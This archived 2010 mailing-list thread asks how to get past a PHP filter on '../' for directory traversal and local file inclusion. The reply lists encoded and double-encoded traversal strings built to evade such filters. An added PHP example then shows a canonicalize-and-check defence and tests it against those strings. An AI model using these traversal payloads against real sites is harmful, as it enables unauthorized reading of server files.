[WEB SECURITY] ../ filtered
Shlomi Narkolayev
shlominar at gmail.com
Tue Feb 16 01:41:16 EST 2010
Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME
Soon I'll upload 1400 new variants for directory traversal to my blog
<http://narkolayev-shlomi.blogspot.com/>.
Kind Regards,
Narkolayev Shlomi.
From: Beatriz Duran [mailto:beatrizdrn at yahoo.com]
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered
Hi, I need to find a vulnerability in a URL that could be exploited for
directory traversal and LFI; the page is working with PHP but it is
filtering /../ and also /%2e%2e/, because the page is using ISO for Latin
characters I can't use extended Unicode because it is reinterpreted with other
values; is there another way to work around the filter?
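
As an added example (not part of the thread and not either poster's code), the PHP below shows a check that does not depend on recognising each encoding listed above: decode the value, canonicalize it with realpath(), then test that the result is still inside the base directory. The function name resolve_inside, the temporary directory layout and the file names ok.txt and secret.txt are assumptions constructed for the demonstration.

```php
<?php
// Added example, not from the thread. resolve_inside() and the directory
// layout are assumptions made for the demonstration.

// Return the canonical path of $value inside $baseDir, or null if it resolves elsewhere.
function resolve_inside(string $baseDir, string $value): ?string
{
    // Decode until stable so %252f -> %2f -> / is judged in its final form.
    for ($round = 0; $round < 5; $round++) {
        $next = rawurldecode($value);
        if ($next === $value) { break; }
        $value = $next;
    }
    if (rawurldecode($value) !== $value || strpos($value, "\0") !== false) {
        return null;                          // still encoded, or NUL byte
    }
    $value = str_replace('\\', '/', $value);  // treat \ as a separator too
    $base  = realpath($baseDir);
    if ($base === false) { return null; }
    $real  = realpath($base . '/' . $value);  // resolves .. and symlinks; false if missing
    if ($real === false) { return null; }
    // Compare canonical forms, with a trailing separator so that
    // /srv/pub does not match /srv/public.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed layout: <tmp>/site/pub/ok.txt is public, <tmp>/secret.txt is not.
$root = sys_get_temp_dir() . '/trav_demo_' . getmypid();
mkdir("$root/site/pub", 0700, true);
file_put_contents("$root/site/pub/ok.txt", 'public');
file_put_contents("$root/secret.txt", 'private');

// The variants listed in the thread, with FILENAME set to secret.txt.
$inputs = [
    'ok.txt',
    '..%5c..%5csecret.txt',
    '%2e%2e\\%2e%2e\\secret.txt',
    '..%c0%af..%c0%afsecret.txt',
    '..%255c..%255csecret.txt',
    '%252e%252e/secret.txt',
    '..%2f..%2fsecret.txt',
    '..%252f..%252fsecret.txt',
];
foreach ($inputs as $in) {
    $verdict = resolve_inside("$root/site/pub", $in) === null ? 'rejected' : 'allowed';
    printf("%-30s %s\n", $in, $verdict);
}
```

Open the file through the canonical path the function returns, not through the original request value, so the string that was checked is the string that is used.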